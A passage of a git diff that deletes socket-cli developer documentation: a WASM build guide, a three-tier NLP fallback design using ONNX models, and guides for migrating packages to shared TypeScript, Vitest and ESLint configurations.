MB | -| CodeT5 encoder (INT4) | ~30 MB | -| CodeT5 decoder (INT4) | ~60 MB | -| Tokenizers | ~1 MB | -| ONNX Runtime | ~2-5 MB | -| Yoga Layout | ~95 KB | -| **Total** | **~115 MB** | - -### After Optimization - -| Stage | Size | Reduction | -|-------|------|-----------| -| Raw WASM | ~115 MB | baseline | -| wasm-opt -Oz | ~108-110 MB | 5-10% | -| Brotli (quality 11) | ~32-35 MB | ~70% | - ---- - -## Troubleshooting - -### Build is slow - -1. 
**Use dev mode for iteration**: - ```bash - node scripts/wasm/build-unified-wasm.mjs --dev - ``` - -2. **Install sccache**: - ```bash - cargo install sccache - export RUSTC_WRAPPER=sccache - ``` - -3. **Check CPU usage**: - ```bash - export CARGO_BUILD_JOBS=$(nproc) - ``` - -### Build fails with wasm-opt - -The build will continue without optimization: - -```bash -# Install binaryen for wasm-opt -brew install binaryen # macOS -sudo apt-get install binaryen # Linux -choco install binaryen # Windows -``` - -### Out of memory - -Large WASM builds may require more memory: - -```bash -# Increase Node.js memory limit -export NODE_OPTIONS="--max-old-space-size=8192" -``` - -### Incremental builds not working - -WASM builds disable incremental compilation: - -```toml -[profile.dev-wasm] -incremental = false # Required for WASM -``` - -Use sccache instead for faster rebuilds. - ---- - -## CI/CD Recommendations - -### GitHub Actions - -```yaml -- name: Setup Rust - uses: actions-rs/toolchain@v1 - with: - toolchain: stable - target: wasm32-unknown-unknown - -- name: Install wasm-pack - run: cargo install wasm-pack - -- name: Install binaryen - run: | - brew install binaryen # macOS - # or apt-get install binaryen for Linux - -- name: Setup build cache - uses: actions/cache@v3 - with: - path: | - ~/.cargo/registry - ~/.cargo/git - target - ~/.cache/sccache - key: ${{ runner.os }}-wasm-${{ hashFiles('**/Cargo.lock') }} - -- name: Build WASM - run: node scripts/wasm/build-unified-wasm.mjs -``` - -### Cache Strategy - -1. **Cargo registry/git** - Dependencies (~500 MB) -2. **Target directory** - Compiled artifacts (~2-3 GB) -3. **sccache directory** - Compilation cache (~1-2 GB) - ---- - -## Advanced: Manual Build Steps - -If you need fine-grained control: - -### 1. 
Direct Cargo Build - -```bash -cd packages/node-smol-builder/wasm-bundle - -# Dev build -cargo build --target wasm32-unknown-unknown --profile dev-wasm - -# Production build -cargo build --target wasm32-unknown-unknown --release -``` - -### 2. Manual wasm-opt - -```bash -# Optimize for size -wasm-opt -Oz input.wasm -o output.wasm - -# Optimize for speed -wasm-opt -O3 input.wasm -o output.wasm - -# With SIMD -wasm-opt -Oz --enable-simd input.wasm -o output.wasm -``` - -### 3. Manual Compression - -```bash -# Brotli compression -brotli -q 11 -w 24 socket_ai_bg.wasm -o socket_ai_bg.wasm.br - -# Check compression ratio -ls -lh socket_ai_bg.wasm* -``` - ---- - -## References - -- **Cargo Profiles**: https://doc.rust-lang.org/cargo/reference/profiles.html -- **wasm-pack**: https://rustwasm.github.io/wasm-pack/ -- **wasm-opt (Binaryen)**: https://github.com/WebAssembly/binaryen -- **sccache**: https://github.com/mozilla/sccache -- **Implementation details**: `.claude/wasm-optimization-summary.md` - ---- - -## Summary - -**For development**: -```bash -node scripts/wasm/build-unified-wasm.mjs --dev # Fast iteration -``` - -**For production**: -```bash -node scripts/wasm/build-unified-wasm.mjs # Fully optimized -``` - -**For benchmarking**: -```bash -node scripts/wasm/benchmark-build.mjs # Compare performance -``` - -**For optimization**: -```bash -node scripts/wasm/setup-build-env.mjs # Setup caching -``` diff --git a/docs/cli/nlp-progressive-enhancement.md b/docs/cli/nlp-progressive-enhancement.md deleted file mode 100644 index 78bb779a5..000000000 --- a/docs/cli/nlp-progressive-enhancement.md +++ /dev/null @@ -1,271 +0,0 @@ -# NLP Progressive Enhancement - -Socket CLI's NLP system uses progressive enhancement to work with or without ONNX Runtime and ML models. 
- -## Overview - -The NLP system provides three tiers of functionality: - -``` -┌─────────────────────────────────────────┐ -│ Tier 3: Full (CodeT5) │ -│ Code analysis & synthesis │ -│ Requires: ONNX Runtime + CodeT5 models│ -└─────────────────────────────────────────┘ -┌─────────────────────────────────────────┐ -│ Tier 2: Enhanced (MiniLM) │ -│ Semantic embeddings │ -│ Requires: ONNX Runtime + MiniLM model │ -└─────────────────────────────────────────┘ -┌─────────────────────────────────────────┐ -│ Tier 1: Baseline (compromise) │ -│ Basic NLP features │ -│ Always available (pure JS) │ -└─────────────────────────────────────────┘ -``` - -## Architecture - -### Stub Pattern - -The `onnx-runtime-stub.mts` module provides a graceful fallback API: - -```typescript -// Try to load real ONNX Runtime, fall back to stub if unavailable. -export async function loadOnnxRuntime() { - try { - const onnx = await import('onnxruntime-node') - return onnx - } catch { - // Return stub for graceful degradation. - return stubOnnxRuntime - } -} -``` - -### Progressive Loading - -The `nlp.mts` module uses capability checks: - -```typescript -// Check if enhanced NLP is available. -async function checkEnhancedNLP(): Promise { - // Load ONNX Runtime (real or stub). - onnxRuntime = await loadOnnxRuntime() - - if (!onnxRuntime) return false - - // Check if models are available. - if (!existsSync(minilmModel)) return false - - // Try to load the model. 
- minilmSession = await onnxRuntime.InferenceSession.create(minilmModel) - - return minilmSession !== null -} -``` - -## Features by Tier - -### Tier 1: Baseline (Always Available) - -Uses `compromise` library for pure JavaScript NLP: - -- `tokenize()` - Basic word tokenization -- `extractEntities()` - Named entity recognition (people, places, organizations) -- `getSentiment()` - Sentiment analysis (positive/negative/neutral) -- `semanticSimilarity()` - Word overlap-based similarity (compromise fallback) -- `analyzeCode()` - Line count and basic complexity estimation - -### Tier 2: Enhanced (When MiniLM + ONNX Available) - -Adds semantic understanding via MiniLM embeddings: - -- `tokenize()` - WordPiece tokenization (more accurate) -- `getEmbedding()` - 384-dimensional semantic embeddings -- `semanticSimilarity()` - Cosine similarity between embeddings - -### Tier 3: Full (When CodeT5 + ONNX Available) - -Adds code-specific ML capabilities: - -- `analyzeCode()` - Deep code analysis via CodeT5 encoder -- `synthesizeCode()` - Code generation via CodeT5 decoder -- `explainVulnerability()` - Security issue explanations -- `suggestFix()` - Automated fix suggestions -- `calculateCodeSimilarity()` - Semantic code similarity - -## Configuration - -### Model Paths - -Configure model locations via environment variable: - -```bash -export SOCKET_CLI_MODELS_PATH=/path/to/models -``` - -Default: `.cache/models/` - -Expected model files: -- `minilm-l6-int4.onnx` - MiniLM embeddings model (INT4 quantized) -- `minilm-l6-tokenizer.json` - MiniLM tokenizer vocabulary -- `codet5-encoder-int4.onnx` - CodeT5 encoder (INT4 quantized) -- `codet5-decoder-int4.onnx` - CodeT5 decoder (INT4 quantized) -- `codet5-tokenizer.json` - CodeT5 tokenizer vocabulary - -### Capability Detection - -Check available features at runtime: - -```typescript -import { getNLPCapabilities } from './utils/nlp.mts' - -const capabilities = await getNLPCapabilities() - -if (capabilities.baseline) { - // Basic NLP 
always available -} - -if (capabilities.enhanced) { - // Semantic embeddings available -} - -if (capabilities.codet5) { - // Code analysis/synthesis available -} -``` - -## Build Requirements - -### Minimal Build (Baseline Only) - -No external dependencies required: -- Pure JavaScript via `compromise` -- Works on any platform -- No WASM compilation needed - -### Enhanced Build (MiniLM) - -Requires: -- ONNX Runtime (`onnxruntime-node` package) -- MiniLM model files (INT4 quantized, ~4MB) - -### Full Build (CodeT5) - -Requires: -- ONNX Runtime (`onnxruntime-node` package) -- CodeT5 model files (INT4 quantized, ~50MB encoder + ~50MB decoder) - -## Testing - -Test without ONNX Runtime: - -```bash -# Temporarily hide onnxruntime-node. -NODE_PATH=/tmp/nonexistent node test-nlp-fallback.mjs -``` - -Verify: -- ✓ Capabilities report baseline-only -- ✓ All functions return results -- ✓ No exceptions thrown -- ✓ Graceful degradation to compromise - -## Benefits - -### For Development - -- Fast builds without waiting for WASM compilation -- Works in environments without ONNX Runtime support -- Easy to test baseline vs enhanced features - -### For Production - -- Smaller binary size without ML models -- Faster startup time without model loading -- Flexible deployment (ship with or without models) - -### For Users - -- CLI works immediately without model downloads -- Optional enhanced features for power users -- No breaking changes when models unavailable - -## Implementation Details - -### Why Stub Instead of Optional Imports? - -We use a stub pattern instead of conditional imports because: - -1. **Type Safety**: Stub provides correct types for IDE autocomplete -2. **Error Handling**: Graceful fallback instead of import errors -3. **Testing**: Easy to test both paths (real vs stub) -4. **Compatibility**: Works with any module system (ESM, CJS) - -### Why INT4 Quantization? - -Models are quantized to INT4 (4-bit integers) for: - -1. **Size**: 8x smaller than FP32 models -2. 
**Speed**: Faster inference on CPU -3. **Memory**: Lower RAM usage -4. **Quality**: Minimal accuracy loss for NLP tasks - -MiniLM: 25MB (FP32) → 4MB (INT4) -CodeT5: 800MB (FP32) → 100MB (INT4) - -### Why Three Tiers? - -- **Baseline**: Ensures CLI always works -- **Enhanced**: Adds semantic understanding without huge models -- **Full**: Maximum capability for security analysis - -## Troubleshooting - -### ONNX Runtime Not Loading - -Symptoms: `enhanced: false` in capabilities - -Solutions: -- Install onnxruntime-node: `npm install onnxruntime-node` -- Check platform support (Node.js 18+, x64/arm64) -- Verify WASM support: `node --experimental-wasm-modules` - -### Models Not Found - -Symptoms: `enhanced: false` even with ONNX Runtime - -Solutions: -- Download models to `.cache/models/` -- Set `SOCKET_CLI_MODELS_PATH` environment variable -- Check file permissions -- Verify model file integrity (INT4 ONNX format) - -### Performance Issues - -Symptoms: Slow NLP operations - -Solutions: -- Use INT4 quantized models (not FP32) -- Enable WASM SIMD: `node --experimental-wasm-simd` -- Enable WASM threads: `node --experimental-wasm-threads` -- Increase Node.js memory: `NODE_OPTIONS="--max-old-space-size=4096"` - -## Future Enhancements - -Potential improvements: - -1. **Model Streaming**: Download models on-demand -2. **WebGPU**: GPU acceleration for faster inference -3. **Model Caching**: Cache embeddings to disk -4. **Quantization**: INT2 models for even smaller size -5. 
**Fine-tuning**: Custom models for Socket-specific tasks - -## References - -- [ONNX Runtime](https://onnxruntime.ai/) -- [MiniLM Paper](https://arxiv.org/abs/2002.10957) -- [CodeT5 Paper](https://arxiv.org/abs/2109.00859) -- [Quantization Guide](https://onnxruntime.ai/docs/performance/model-optimizations/quantization.html) -- [Progressive Enhancement](https://developer.mozilla.org/en-US/docs/Glossary/Progressive_Enhancement) diff --git a/docs/configuration/configuration-migration.md b/docs/configuration/configuration-migration.md deleted file mode 100644 index 46371f4fd..000000000 --- a/docs/configuration/configuration-migration.md +++ /dev/null @@ -1,308 +0,0 @@ -# Configuration Migration Guide - -This guide explains how to migrate packages in the socket-cli monorepo to use the shared configuration architecture. - -## Overview - -The monorepo now has shared configuration files in `.config/` at the root level. Packages should extend these base configurations instead of duplicating settings. - -## Shared Configuration Files - -### Location: `.config/` - -- `tsconfig.base.json` - Base TypeScript settings -- `tsconfig.build.json` - For build outputs with declarations -- `tsconfig.test.json` - For test files -- `vitest.config.base.mts` - Base Vitest test configuration -- `eslint.config.mjs` - ESLint flat config (monorepo-wide) -- `esbuild-inject-import-meta.mjs` - Import.meta polyfill for esbuild - -## Migration Steps by Configuration Type - -### TypeScript Configuration - -#### Before (Duplicated Config) - -```json -{ - "compilerOptions": { - "target": "ES2024", - "module": "nodenext", - "strict": true, - "exactOptionalPropertyTypes": true, - "noUncheckedIndexedAccess": true, - // ... 
30+ more options - }, - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -#### After (Extended Config) - -```json -{ - "extends": "../../.config/tsconfig.base.json", - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -#### With Custom Paths - -For packages that need path mappings (like CLI with local dependencies): - -```json -{ - "extends": "../../.config/tsconfig.base.json", - "compilerOptions": { - "paths": { - "@socketsecurity/lib": ["../../socket-lib/dist/index.d.ts"], - "@socketsecurity/registry": ["../../socket-registry/registry/dist/index.d.ts"] - } - }, - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -### Vitest Configuration - -#### Before (Duplicated Config) - -```typescript -import { defineConfig } from 'vitest/config' - -export default defineConfig({ - test: { - globals: false, - environment: 'node', - include: ['test/**/*.test.{mts,ts}'], - exclude: [ - '**/node_modules/**', - '**/dist/**', - // ... many more patterns - ], - pool: 'threads', - poolOptions: { - threads: { - singleThread: false, - maxThreads: 16, - minThreads: 4, - isolate: false, - useAtomics: true, - }, - }, - testTimeout: 30_000, - hookTimeout: 30_000, - coverage: { - provider: 'v8', - reporter: ['text', 'json', 'html', 'lcov', 'clover'], - // ... 
many more options - }, - }, -}) -``` - -#### After (Merged Config) - -```typescript -import { defineConfig, mergeConfig } from 'vitest/config' -import baseConfig from '../../.config/vitest.config.base.mts' - -export default mergeConfig( - baseConfig, - defineConfig({ - test: { - include: [ - 'test/**/*.test.{mts,ts}', - 'src/**/*.test.{mts,ts}', - ], - setupFiles: ['./test/setup.mts'], - }, - }) -) -``` - -#### With Custom Settings - -For packages with special needs (e.g., longer timeouts, custom coverage): - -```typescript -import { defineConfig, mergeConfig } from 'vitest/config' -import baseConfig from '../../.config/vitest.config.base.mts' - -export default mergeConfig( - baseConfig, - defineConfig({ - test: { - testTimeout: 120_000, // 2 minutes for slow tests - hookTimeout: 30_000, - coverage: { - thresholds: { - lines: 0, - functions: 0, - branches: 0, - statements: 0, - }, - }, - }, - }) -) -``` - -### ESLint Configuration - -#### Root Level Only - -The ESLint configuration lives at the root and applies to the entire monorepo. Individual packages **do not** need their own ESLint configs. - -#### Package-Specific Rules (Rare) - -If a package truly needs custom ESLint rules, extend the root config: - -```javascript -import rootConfig from '../../.config/eslint.config.mjs' - -export default [ - ...rootConfig, - { - files: ['src/**/*.mts'], - rules: { - // Package-specific overrides - 'no-console': 'warn', - }, - }, -] -``` - -### esbuild Configuration - -#### Before (Relative Paths) - -```javascript -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) - -export default { - // ... 
config - inject: [path.join(__dirname, 'esbuild-inject-import-meta.mjs')], -} -``` - -#### After (Shared Utility) - -```javascript -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '..') - -export default { - // ... config - inject: [path.join(rootPath, '..', '..', '.config', 'esbuild-inject-import-meta.mjs')], -} -``` - -## Package-by-Package Migration Plan - -### Phase 1: Simple Packages (Low Risk) - -Start with packages that have minimal custom configuration: - -1. **packages/cli-with-sentry** - - Simple vitest config (just timeout overrides) - - Should extend base config easily - -2. **packages/node-smol-builder** - - Simple vitest config (just timeout overrides) - - Should extend base config easily - -3. **packages/node-sea-builder** - - Simple vitest config (just timeout overrides) - - Should extend base config easily - -4. **packages/socket** - - Simple vitest config with coverage overrides - - Should extend base config easily - -### Phase 2: Complex Package (Higher Risk) - -5. **packages/cli** - - Has complex .config/ subdirectory - - Multiple TypeScript configs (base, check) - - Custom esbuild configs - - Should migrate carefully, keeping package-specific build configs - -### Phase 3: Root Configs - -6. **Root vitest configs** - - `vitest.config.mts` - Already serves as template for base config - - `vitest.config.isolated.mts` - Keep for isolated test runs - - `vitest.e2e.config.mts` - Keep for E2E tests - -## Migration Checklist - -For each package: - -- [ ] Read current tsconfig.json and identify custom settings -- [ ] Create new tsconfig.json that extends `../../.config/tsconfig.base.json` -- [ ] Move custom compilerOptions (paths, typeRoots, etc.) 
to new config -- [ ] Keep include/exclude patterns specific to the package -- [ ] Test: Run `pnpm tsc` to verify type checking still works - -- [ ] Read current vitest.config.mts and identify custom settings -- [ ] Create new vitest.config.mts that merges with base config -- [ ] Move custom test settings (timeouts, includes, setupFiles) to new config -- [ ] Test: Run `pnpm test` to verify tests still pass - -- [ ] Identify any package-specific eslint configs -- [ ] If none exist, no action needed (root config applies) -- [ ] If custom rules exist, evaluate if they should move to root or stay local - -- [ ] Update esbuild configs to use shared import.meta inject helper -- [ ] Test: Run builds to verify output is correct - -- [ ] Remove duplicate configuration files -- [ ] Update documentation if package has special config needs -- [ ] Commit changes with descriptive message - -## Validation - -After migration, verify: - -1. **Type checking**: `pnpm tsc` passes -2. **Linting**: `pnpm check:lint` passes -3. **Tests**: `pnpm test` passes -4. **Build**: `pnpm build` produces expected output -5. **Coverage**: `pnpm run test:unit:coverage` works - -## Rollback Plan - -If migration causes issues: - -1. Keep git history clean with one package per commit -2. Revert individual package commits if needed -3. Document any incompatibilities discovered -4. Update base configs to accommodate edge cases - -## Benefits After Migration - -1. **Reduced Lines of Code**: 50-100+ lines removed per package -2. **Single Source of Truth**: Update once, applies everywhere -3. **Consistency**: All packages use same base settings -4. **Easier Maintenance**: Less configuration to track -5. **Better Defaults**: Proven settings with documented rationale - -## Questions or Issues? - -If you encounter problems during migration: - -1. Check `.config/README.md` for usage examples -2. Compare with already-migrated packages -3. Verify you're using mergeConfig for Vitest (not defineConfig alone) -4. 
Ensure extends paths are correct (../../.config/...) -5. Document any edge cases for future reference diff --git a/docs/configuration/configuration-summary.md b/docs/configuration/configuration-summary.md deleted file mode 100644 index cccf1c9f7..000000000 --- a/docs/configuration/configuration-summary.md +++ /dev/null @@ -1,272 +0,0 @@ -# Shared Configuration Architecture - Summary - -## Overview - -A comprehensive shared configuration architecture has been implemented for the socket-cli monorepo. All shared configuration now lives in `.config/` at the root level, providing a single source of truth for TypeScript, Vitest, ESLint, and build utilities. - -## What Was Created - -### Directory Structure - -``` -.config/ -├── README.md # Usage documentation and examples -├── tsconfig.base.json # Base TypeScript configuration -├── tsconfig.build.json # Build-specific TS config -├── tsconfig.test.json # Test-specific TS config -├── vitest.config.base.mts # Base Vitest test configuration -├── eslint.config.mjs # ESLint flat config (monorepo-wide) -└── esbuild-inject-import-meta.mjs # Import.meta polyfill for esbuild -``` - -### Configuration Files (7 files, ~739 lines) - -1. **TypeScript Configurations** (3 files) - - `tsconfig.base.json` - Strict TypeScript settings for all packages - - `tsconfig.build.json` - Extends base for declaration generation - - `tsconfig.test.json` - Extends base with relaxed rules for tests - -2. **Vitest Configuration** (1 file) - - `vitest.config.base.mts` - Base test runner configuration with optimal thread pool settings - -3. **ESLint Configuration** (1 file) - - `eslint.config.mjs` - Comprehensive flat config with TypeScript, import ordering, and Node.js rules - -4. **Build Utilities** (1 file) - - `esbuild-inject-import-meta.mjs` - Polyfill for import.meta.url in CommonJS bundles - -5. **Documentation** (1 file) - - `README.md` - Usage examples and reference for all configurations - -### Documentation (3 files) - -1. 
**docs/shared-configuration-architecture.md** - - Design principles and rationale - - Directory structure and file descriptions - - Configuration patterns and examples - - Key decisions with trade-offs - - Future enhancements - -2. **docs/configuration-migration.md** - - Step-by-step migration guide - - Before/after examples - - Package-by-package migration plan - - Validation checklist - - Rollback procedures - -3. **docs/configuration-summary.md** (this file) - - Quick reference overview - - Migration roadmap - - Expected benefits - -## Current State Analysis - -### Root Level - -**Existing configs**: -- ✓ `.config/tsconfig.base.json` - Already existed, now documented -- ✓ `tsconfig.json` - Extends `.config/tsconfig.base.json` -- ✓ `vitest.config.mts` - Root test config (can be aligned with base) -- ✓ `vitest.config.isolated.mts` - Special purpose (keep as-is) -- ✓ `vitest.e2e.config.mts` - E2E tests (keep as-is) -- ✓ `biome.json` - Formatter config (keep as-is) - -**New configs**: -- ✓ `.config/tsconfig.build.json` -- ✓ `.config/tsconfig.test.json` -- ✓ `.config/vitest.config.base.mts` -- ✓ `.config/eslint.config.mjs` (copied from packages/cli) -- ✓ `.config/esbuild-inject-import-meta.mjs` (copied from packages/cli) - -### Package Level - -**packages/cli/**: -- Current: Has own `.config/` with tsconfig.base.json, tsconfig.check.json, eslint.config.mjs, esbuild configs -- Migration: Update tsconfig.json to extend root base, migrate vitest config -- Keep: Package-specific build configs (esbuild, babel) - -**packages/cli-with-sentry/**: -- Current: Simple vitest.config.mts -- Migration: Easy - extend base vitest config - -**packages/socket/**: -- Current: Simple vitest.config.mts with coverage overrides -- Migration: Easy - extend base vitest config with coverage overrides - -**packages/socketbin-\*/**: -- Current: Simple vitest.config.mts files -- Migration: Easy - extend base vitest config - -## Migration Roadmap - -### Phase 1: Documentation ✓ COMPLETE - -- [x] 
Create shared configuration files -- [x] Write comprehensive documentation -- [x] Document migration process -- [x] Create usage examples - -### Phase 2: Simple Packages (Recommended Next) - -Migrate packages with minimal custom configuration: - -1. **packages/node-smol-builder** - - Impact: Low risk - - Effort: 15-30 minutes - - Files: tsconfig.json, vitest.config.mts - -2. **packages/node-sea-builder** - - Impact: Low risk - - Effort: 15-30 minutes - - Files: tsconfig.json, vitest.config.mts - -3. **packages/cli-with-sentry** - - Impact: Low risk - - Effort: 15-30 minutes - - Files: tsconfig.json, vitest.config.mts - -4. **packages/socket** - - Impact: Medium risk (coverage overrides) - - Effort: 30-45 minutes - - Files: tsconfig.json, vitest.config.mts - -### Phase 3: Complex Package - -5. **packages/cli** - - Impact: Medium-high risk (many custom configs) - - Effort: 1-2 hours - - Files: tsconfig.json, vitest.config.mts, .config/tsconfig.check.json - - Note: Keep package-specific build configs (esbuild, babel) - -### Phase 4: Root Alignment - -6. **Root vitest.config.mts** - - Impact: Low risk - - Effort: 30 minutes - - Consider: Align with base config or keep as template - -## Expected Benefits - -### Quantitative - -- **Lines of Code**: Reduce 50-100 lines per package -- **Maintenance**: 1 file to update instead of 5-10 -- **Consistency**: 100% config alignment across packages -- **Duplication**: ~75-90% reduction in config duplication - -### Qualitative - -1. **Single Source of Truth** - All shared settings in `.config/` -2. **Easier Onboarding** - New packages start with proven configs -3. **Better Defaults** - Settings based on Socket team experience -4. **Faster Updates** - Change once, applies everywhere -5. **Clear Overrides** - Easy to see what's custom vs. 
standard - -## Configuration Patterns - -### Simple Package Example - -**Before** (95 lines): -- tsconfig.json: 40 lines of duplicated compiler options -- vitest.config.mts: 55 lines of duplicated test settings - -**After** (10 lines): -- tsconfig.json: 5 lines (extends + include/exclude) -- vitest.config.mts: 5 lines (merge base + custom include) - -**Savings**: 85 lines (89% reduction) - -### Package with Custom Paths Example - -**Before** (100 lines): -- tsconfig.json: 45 lines (40 base + 5 paths) -- vitest.config.mts: 55 lines - -**After** (15 lines): -- tsconfig.json: 10 lines (extends + paths + include/exclude) -- vitest.config.mts: 5 lines - -**Savings**: 85 lines (85% reduction) - -## Key Design Decisions - -### 1. TypeScript: noUncheckedIndexedAccess - -**Enabled by default** - Prevents runtime errors from undefined access - -### 2. Vitest: isolate: false - -**Disabled by default** - 2-3x performance improvement, required for mocking - -### 3. ESLint: Single Root Config - -**One config for all** - Flat config naturally works across monorepo - -### 4. ESLint: Type-Aware Linting Disabled - -**Disabled by default** - Prevents performance issues on large codebases - -### 5. 
Build Configs: Package-Specific - -**Keep in packages** - esbuild, babel configs stay with packages - -## Quick Start for Packages - -### TypeScript - -```json -{ - "extends": "../../.config/tsconfig.base.json", - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -### Vitest - -```typescript -import { defineConfig, mergeConfig } from 'vitest/config' -import baseConfig from '../../.config/vitest.config.base.mts' - -export default mergeConfig( - baseConfig, - defineConfig({ - test: { - include: ['test/**/*.test.{mts,ts}'], - }, - }) -) -``` - -## Validation Checklist - -After migration: - -- [ ] Type checking: `pnpm tsc` passes -- [ ] Linting: `pnpm check:lint` passes -- [ ] Tests: `pnpm test` passes -- [ ] Build: `pnpm build` produces expected output -- [ ] Coverage: `pnpm run test:unit:coverage` works - -## Next Steps - -1. **Review** - Review shared configs and documentation -2. **Approve** - Get team approval for architecture -3. **Migrate** - Start with Phase 2 simple packages -4. **Validate** - Run full test suite after each migration -5. **Iterate** - Adjust base configs based on feedback - -## Resources - -- [Shared Configuration Architecture](./shared-configuration-architecture.md) - Full design document -- [Configuration Migration Guide](./configuration-migration.md) - Detailed migration steps -- [.config/README.md](../.config/README.md) - Usage reference and examples - -## Support - -For questions or issues: - -1. Check `.config/README.md` for usage examples -2. Review docs/configuration-migration.md for migration steps -3. Compare with migrated packages -4. 
Document edge cases for future reference diff --git a/docs/configuration/shared-configuration-architecture.md b/docs/configuration/shared-configuration-architecture.md deleted file mode 100644 index 4c3b6ed9c..000000000 --- a/docs/configuration/shared-configuration-architecture.md +++ /dev/null @@ -1,299 +0,0 @@ -# Shared Configuration Architecture - -This document describes the shared configuration architecture for the socket-cli monorepo. - -## Design Principles - -1. **Single Source of Truth** - All shared configuration lives in `.config/` at the root -2. **Minimal Duplication** - Packages extend base configs, not copy them -3. **Easy Maintenance** - Update configuration in one place -4. **Progressive Enhancement** - Packages can override when needed -5. **Explicit Overrides** - Clear separation between base and custom settings - -## Directory Structure - -``` -socket-cli/ -├── .config/ # Shared configuration (NEW) -│ ├── README.md # Usage documentation -│ ├── tsconfig.base.json # Base TypeScript config -│ ├── tsconfig.build.json # Build-specific TS config -│ ├── tsconfig.test.json # Test-specific TS config -│ ├── vitest.config.base.mts # Base Vitest config -│ ├── eslint.config.mjs # ESLint flat config -│ └── esbuild-inject-import-meta.mjs # esbuild helper -├── biome.json # Biome formatter (root-only) -├── tsconfig.json # Root TS config (extends .config) -├── vitest.config.mts # Root Vitest config (already uses patterns from base) -├── vitest.config.isolated.mts # Isolated test config (special purpose) -├── vitest.e2e.config.mts # E2E test config (special purpose) -└── packages/ - ├── cli/ - │ ├── tsconfig.json # Extends ../../.config/tsconfig.base.json - │ ├── vitest.config.mts # Merges ../../.config/vitest.config.base.mts - │ └── .config/ # Package-specific build configs - │ ├── tsconfig.check.json # Type checking with custom paths - │ ├── esbuild.cli.build.mjs # CLI build config - │ └── babel.config.js # Babel for React components - ├── cli-with-sentry/ - │ 
├── tsconfig.json # Extends ../../.config/tsconfig.base.json - │ └── vitest.config.mts # Merges ../../.config/vitest.config.base.mts - ├── socket/ - │ ├── tsconfig.json # Extends ../../.config/tsconfig.base.json - │ └── vitest.config.mts # Merges ../../.config/vitest.config.base.mts - └── socketbin-*/ - ├── tsconfig.json # Extends ../../.config/tsconfig.base.json - └── vitest.config.mts # Merges ../../.config/vitest.config.base.mts -``` - -## Configuration Files - -### TypeScript Configurations - -#### `.config/tsconfig.base.json` - -Base TypeScript configuration with strict settings: - -- **Target**: ES2024 -- **Module**: nodenext (Node.js ESM + CJS) -- **Strict Mode**: Full TypeScript strict mode -- **Extra Safety**: - - `exactOptionalPropertyTypes: true` - - `noUncheckedIndexedAccess: true` - - `noPropertyAccessFromIndexSignature: true` -- **Compatibility**: Designed for @typescript/native-preview - -**When to use**: All TypeScript projects should extend this. - -#### `.config/tsconfig.build.json` - -Extends base config for build outputs: - -- Enables `declaration: true` (generate .d.ts files) -- Enables `declarationMap: true` (source maps for declarations) -- Enables `composite: true` (project references) -- Enables `incremental: true` (faster rebuilds) - -**When to use**: Packages that need to emit type declarations. - -#### `.config/tsconfig.test.json` - -Extends base config for test files: - -- Relaxes `noUnusedLocals: false` -- Relaxes `noUnusedParameters: false` - -**When to use**: Test-specific type checking configs. 
- -### Vitest Configuration - -#### `.config/vitest.config.base.mts` - -Base Vitest test runner configuration: - -- **Environment**: Node.js -- **Pool**: Threads with optimal settings - - `isolate: false` for performance and mocking compatibility - - `maxThreads: 16` (or 1 for coverage) - - `minThreads: 4` (or 1 for coverage) -- **Timeouts**: 30 seconds for tests and hooks -- **Coverage**: v8 provider with comprehensive settings -- **Exclusions**: Standard patterns (node_modules, dist, etc.) - -**When to use**: All packages should merge this config. - -### ESLint Configuration - -#### `.config/eslint.config.mjs` - -Flat config ESLint setup for the entire monorepo: - -- **TypeScript Support**: @typescript-eslint with type checking disabled (performance) -- **Import Rules**: eslint-plugin-import-x with auto-fix ordering -- **Node.js Rules**: eslint-plugin-n for Node.js compatibility -- **Custom Rules**: - - Sort destructured keys - - Prefer const - - No await in loop (warning) - - Unicorn rules for best practices -- **Integration**: Imports patterns from biome.json and .gitignore - -**When to use**: Applies automatically to entire monorepo. Packages rarely need custom configs. - -### Build Utilities - -#### `.config/esbuild-inject-import-meta.mjs` - -Polyfill for import.meta.url in CommonJS bundles: - -```javascript -export const __importMetaUrl = - typeof __filename !== 'undefined' - ? `file://${__filename.replace(/\\/g, '/')}` - : 'file:///unknown' -``` - -**When to use**: esbuild configs that bundle to CommonJS but need import.meta.url support. 
- -## Configuration Patterns - -### Pattern 1: Simple Package - -Minimal custom configuration: - -**tsconfig.json**: -```json -{ - "extends": "../../.config/tsconfig.base.json", - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -**vitest.config.mts**: -```typescript -import { defineConfig, mergeConfig } from 'vitest/config' -import baseConfig from '../../.config/vitest.config.base.mts' - -export default mergeConfig( - baseConfig, - defineConfig({ - test: { - include: ['test/**/*.test.{mts,ts}'], - }, - }) -) -``` - -### Pattern 2: Package with Custom Paths - -TypeScript path mappings for local dependencies: - -**tsconfig.json**: -```json -{ - "extends": "../../.config/tsconfig.base.json", - "compilerOptions": { - "paths": { - "@socketsecurity/lib": ["../../socket-lib/dist/index.d.ts"] - } - }, - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -### Pattern 3: Package with Custom Coverage - -Override coverage thresholds: - -**vitest.config.mts**: -```typescript -import { defineConfig, mergeConfig } from 'vitest/config' -import baseConfig from '../../.config/vitest.config.base.mts' - -export default mergeConfig( - baseConfig, - defineConfig({ - test: { - include: ['test/**/*.test.{mts,ts}'], - coverage: { - thresholds: { - lines: 0, - functions: 0, - branches: 0, - statements: 0, - }, - }, - }, - }) -) -``` - -### Pattern 4: Package with Build-Specific Configs - -Separate configs for different purposes: - -``` -packages/cli/.config/ -├── tsconfig.base.json # Base settings (can extend root) -├── tsconfig.check.json # Type checking with custom paths -├── esbuild.cli.build.mjs # CLI build config -└── babel.config.js # React component transpilation -``` - -## Rationale for Key Decisions - -### TypeScript: noUncheckedIndexedAccess - -**Decision**: Enabled by default - -**Rationale**: -- Prevents common runtime errors from undefined array/object access -- Enforces defensive programming -- 